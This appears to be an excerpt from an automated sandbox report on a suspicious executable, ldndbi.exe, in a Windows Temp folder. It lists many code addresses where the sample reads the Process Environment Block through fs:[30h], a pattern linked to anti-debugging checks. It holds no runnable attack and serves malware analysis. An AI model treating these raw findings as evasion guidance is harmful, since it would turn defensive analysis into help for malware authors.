Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A30050 mov eax, dword ptr fs:[00000030h] 3_2_00A30050
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A30050 mov eax, dword ptr fs:[00000030h] 3_2_00A30050
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A461A0 mov eax, dword ptr fs:[00000030h] 3_2_00A461A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A461A0 mov eax, dword ptr fs:[00000030h] 3_2_00A461A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A969A6 mov eax, dword ptr fs:[00000030h] 3_2_00A969A6
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h] 3_2_00A951BE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h] 3_2_00A951BE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h] 3_2_00A951BE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h] 3_2_00A951BE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A185 mov eax, dword ptr fs:[00000030h] 3_2_00A4A185
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3C182 mov eax, dword ptr fs:[00000030h] 3_2_00A3C182
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42990 mov eax, dword ptr fs:[00000030h] 3_2_00A42990
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A1B1E1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A1B1E1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A1B1E1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AA41E8 mov eax, dword ptr fs:[00000030h] 3_2_00AA41E8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov ecx, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4513A mov eax, dword ptr fs:[00000030h] 3_2_00A4513A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4513A mov eax, dword ptr fs:[00000030h] 3_2_00A4513A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h] 3_2_00A19100
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h] 3_2_00A19100
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h] 3_2_00A19100
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1C962 mov eax, dword ptr fs:[00000030h] 3_2_00A1C962
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B171 mov eax, dword ptr fs:[00000030h] 3_2_00A1B171
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B171 mov eax, dword ptr fs:[00000030h] 3_2_00A1B171
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3B944 mov eax, dword ptr fs:[00000030h] 3_2_00A3B944
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3B944 mov eax, dword ptr fs:[00000030h] 3_2_00A3B944
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A2AAB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A2AAB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A4FAB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4D294 mov eax, dword ptr fs:[00000030h] 3_2_00A4D294
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4D294 mov eax, dword ptr fs:[00000030h] 3_2_00A4D294
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42AE4 mov eax, dword ptr fs:[00000030h] 3_2_00A42AE4
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42ACB mov eax, dword ptr fs:[00000030h] 3_2_00A42ACB
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A54A2C mov eax, dword ptr fs:[00000030h] 3_2_00A54A2C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A54A2C mov eax, dword ptr fs:[00000030h] 3_2_00A54A2C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A28A0A mov eax, dword ptr fs:[00000030h] 3_2_00A28A0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h] 3_2_00A15210
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A15210 mov ecx, dword ptr fs:[00000030h] 3_2_00A15210
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h] 3_2_00A15210
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h] 3_2_00A15210
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A1AA16
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A1AA16
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ADAA16
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ADAA16
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A33A1C mov eax, dword ptr fs:[00000030h] 3_2_00A33A1C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACB260 mov eax, dword ptr fs:[00000030h] 3_2_00ACB260
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACB260 mov eax, dword ptr fs:[00000030h] 3_2_00ACB260
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8A62 mov eax, dword ptr fs:[00000030h] 3_2_00AE8A62
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5927A mov eax, dword ptr fs:[00000030h] 3_2_00A5927A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h] 3_2_00A19240
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h] 3_2_00A19240
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h] 3_2_00A19240
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h] 3_2_00A19240
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADEA55 mov eax, dword ptr fs:[00000030h] 3_2_00ADEA55
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AA4257 mov eax, dword ptr fs:[00000030h] 3_2_00AA4257
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h] 3_2_00A44BAD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h] 3_2_00A44BAD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h] 3_2_00A44BAD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00AE5BA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD138A mov eax, dword ptr fs:[00000030h] 3_2_00AD138A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACD380 mov ecx, dword ptr fs:[00000030h] 3_2_00ACD380
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A21B8F mov eax, dword ptr fs:[00000030h] 3_2_00A21B8F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A21B8F mov eax, dword ptr fs:[00000030h] 3_2_00A21B8F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42397 mov eax, dword ptr fs:[00000030h] 3_2_00A42397
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4B390 mov eax, dword ptr fs:[00000030h] 3_2_00A4B390
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00A3DBE9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A953CA mov eax, dword ptr fs:[00000030h] 3_2_00A953CA
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A953CA mov eax, dword ptr fs:[00000030h] 3_2_00A953CA
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD131B mov eax, dword ptr fs:[00000030h] 3_2_00AD131B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1DB60 mov ecx, dword ptr fs:[00000030h] 3_2_00A1DB60
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A43B7A mov eax, dword ptr fs:[00000030h] 3_2_00A43B7A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A43B7A mov eax, dword ptr fs:[00000030h] 3_2_00A43B7A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1DB40 mov eax, dword ptr fs:[00000030h] 3_2_00A1DB40
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8B58 mov eax, dword ptr fs:[00000030h] 3_2_00AE8B58
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1F358 mov eax, dword ptr fs:[00000030h] 3_2_00A1F358
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2849B mov eax, dword ptr fs:[00000030h] 3_2_00A2849B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD14FB mov eax, dword ptr fs:[00000030h] 3_2_00AD14FB
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A96CF0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A96CF0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A96CF0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00AE8CD6
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4BC2C mov eax, dword ptr fs:[00000030h] 3_2_00A4BC2C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h] 3_2_00AE740D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h] 3_2_00AE740D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h] 3_2_00AE740D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h] 3_2_00A96C0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h] 3_2_00A96C0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h] 3_2_00A96C0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h] 3_2_00A96C0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3746D mov eax, dword ptr fs:[00000030h] 3_2_00A3746D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A44B mov eax, dword ptr fs:[00000030h] 3_2_00A4A44B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAC450 mov eax, dword ptr fs:[00000030h] 3_2_00AAC450
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAC450 mov eax, dword ptr fs:[00000030h] 3_2_00AAC450
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE05AC mov eax, dword ptr fs:[00000030h] 3_2_00AE05AC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE05AC mov eax, dword ptr fs:[00000030h] 3_2_00AE05AC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A435A1 mov eax, dword ptr fs:[00000030h] 3_2_00A435A1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A41DB5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A41DB5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A41DB5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h] 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h] 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h] 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h] 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A4FD9B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A4FD9B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A2D5E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A2D5E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ADFDE2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ADFDE2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ADFDE2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ADFDE2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AC8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00AC8DF1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1AD30 mov eax, dword ptr fs:[00000030h] 3_2_00A1AD30
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADE539 mov eax, dword ptr fs:[00000030h] 3_2_00ADE539
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8D34 mov eax, dword ptr fs:[00000030h] 3_2_00AE8D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A9A537 mov eax, dword ptr fs:[00000030h] 3_2_00A9A537
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h] 3_2_00A44D3B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h] 3_2_00A44D3B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h] 3_2_00A44D3B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3C577 mov eax, dword ptr fs:[00000030h] 3_2_00A3C577
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3C577 mov eax, dword ptr fs:[00000030h] 3_2_00A3C577
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A53D43 mov eax, dword ptr fs:[00000030h] 3_2_00A53D43
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A93540 mov eax, dword ptr fs:[00000030h] 3_2_00A93540
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A37D50 mov eax, dword ptr fs:[00000030h] 3_2_00A37D50
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AE0EA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AE0EA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AE0EA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A946A7 mov eax, dword ptr fs:[00000030h] 3_2_00A946A7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAFE87 mov eax, dword ptr fs:[00000030h] 3_2_00AAFE87
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A276E2 mov eax, dword ptr fs:[00000030h] 3_2_00A276E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A416E0 mov ecx, dword ptr fs:[00000030h] 3_2_00A416E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A58EC7 mov eax, dword ptr fs:[00000030h] 3_2_00A58EC7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A436CC mov eax, dword ptr fs:[00000030h] 3_2_00A436CC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00ACFEC0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00AE8ED6
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1E620 mov eax, dword ptr fs:[00000030h] 3_2_00A1E620
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACFE3F mov eax, dword ptr fs:[00000030h] 3_2_00ACFE3F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h] 3_2_00A1C600
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h] 3_2_00A1C600
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h] 3_2_00A1C600
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A48E00 mov eax, dword ptr fs:[00000030h] 3_2_00A48E00
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1608 mov eax, dword ptr fs:[00000030h] 3_2_00AD1608
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A61C mov eax, dword ptr fs:[00000030h] 3_2_00A4A61C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A61C mov eax, dword ptr fs:[00000030h] 3_2_00A4A61C
